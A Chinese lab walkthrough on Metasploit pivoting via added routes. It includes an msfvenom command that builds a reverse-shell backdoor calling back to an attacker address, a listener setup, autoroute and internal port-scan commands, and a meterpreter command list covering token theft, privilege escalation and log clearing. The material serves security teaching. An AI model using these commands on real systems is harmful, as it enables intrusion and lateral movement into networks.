内網安全之：Metasploit 跳闆攻擊: 添加路由方式

鄭重聲明：

本筆記編寫目的隻用于安全知識提升，并與更多人共享安全知識，切勿使用筆記中的技術進行違法活動，利用筆記中的技術造成的後果與作者本人無關。倡導維護網絡安全人人有責，共同維護網絡文明和諧。

Metasploit 跳闆攻擊: 添加路由方式

• 1 Metasploit 跳闆攻擊: 添加路由方式原理
• 2 實驗環境
• • 2.1 建立 meterpreter 反向連接配接
  • 2.2 檢視目前系統資訊
  • 2.3 利用增加的路由掃描新網段的主機
• 3 meterpreter 基礎指令

1 Metasploit 跳闆攻擊: 添加路由方式原理

• 通過網絡層可達實作跳闆攻擊
• 缺點是容易被防火牆攔截流量。

2 實驗環境

[外鍊圖檔轉存失敗,源站可能有防盜鍊機制,建議将圖檔儲存下來直接上傳(img-OLUbH4Yo-1630742567249)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20210904133542442.png)]

2.1 建立 meterpreter 反向連接配接

1. 生成 Metaspolit 後門程式

   msfvenom  -p windows/meterpreter/reverse_tcp lhost=192.168.0.2 lport=4444 -f exe > /var/www/html/evil.exe
              

2. kali 配置監聽 meterpreter 反向連接配接

   use exploit/multi/handler
   set payload windows/meterpreter/reverse_tcp
   set lhost 192.168.0.2
   run
              

3. WEB Server 下載下傳 Metaspolit 後門程式，并打開程式
4. meterpreter 反向連接配接建立成功

   

2.2 檢視目前系統資訊

1. 檢視目前系統路由資訊，發現存在新網段：

   10.2.1.0/24

   ipconfig
   route list
              

   [外鍊圖檔轉存失敗,源站可能有防盜鍊機制,建議将圖檔儲存下來直接上傳(img-VQIvMrs3-1630742567254)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20210904154859336.png)]

   [外鍊圖檔轉存失敗,源站可能有防盜鍊機制,建議将圖檔儲存下來直接上傳(img-dflEbOG0-1630742567256)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20210904154622491.png)]

2. 添加去往該目标網段的路由

   run post/multi/manage/autoroute
   run autoroute -p
              

   [外鍊圖檔轉存失敗,源站可能有防盜鍊機制,建議将圖檔儲存下來直接上傳(img-c5sv5i6Q-1630742567257)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20210904155138615.png)]

   檢視添加的路由，下一跳指向 session 1

2.3 利用增加的路由掃描新網段的主機

• 使用 MSF 端口掃描子產品進行掃描

  use auxiliary/scanner/portscan/tcp
  set ports 135,139,445,23,80,8080
  set rhosts 10.2.1.1-10.2.1.3
             

  [外鍊圖檔轉存失敗,源站可能有防盜鍊機制,建議将圖檔儲存下來直接上傳(img-darL1exr-1630742567258)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20210904155302807.png)]
• NMAP 掃描：由結果可知端口被防火牆過濾

  db_nmap -sV -p23,80 10.2.1.3
             

  [外鍊圖檔轉存失敗,源站可能有防盜鍊機制,建議将圖檔儲存下來直接上傳(img-5vVjCq4x-1630742567259)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20210904155454589.png)]

3 meterpreter 基礎指令

Stdapi: Networking Commands
===========================
Command       Description
-------       -----------
arp           Display the host ARP cache
getproxy      Display the current proxy configuration
ifconfig      Display interfaces
ipconfig      Display interfaces
netstat       Display the network connections
portfwd       Forward a local port to a remote service
resolve       Resolve a set of host names on the target
route         View and modify the routing table

Stdapi: System Commands
=======================
Command       Description
-------       -----------
clearev       Clear the event log
drop_token    Relinquishes any active impersonation token.
execute       Execute a command
getenv        Get one or more environment variable values
getpid        Get the current process identifier
getprivs      Attempt to enable all privileges available to the current process 盡可能提升權限
getsid        Get the SID of the user that the server is running as
getuid        Get the user that the server is running as 檢視目前使用者
kill          Terminate a process
localtime     Displays the target system local date and time
pgrep         Filter processes by name
pkill         Terminate processes by name
ps            List running processes 列出程序
reboot        Reboots the remote computer
reg           Modify and interact with the remote registry
rev2self      Calls RevertToSelf() on the remote machine
shell         Drop into a system command shell
shutdown      Shuts down the remote computer
steal_token   Attempts to steal an impersonation token from the target process
suspend       Suspends or resumes a list of processes
sysinfo       Gets information about the remote system, such as OS 檢視系統資訊
migrate       Migrate the server to another process 注入程序
getsystem     Attempt to elevate your privilege to that of local system. 通過各種攻擊向量來提升本地系統權限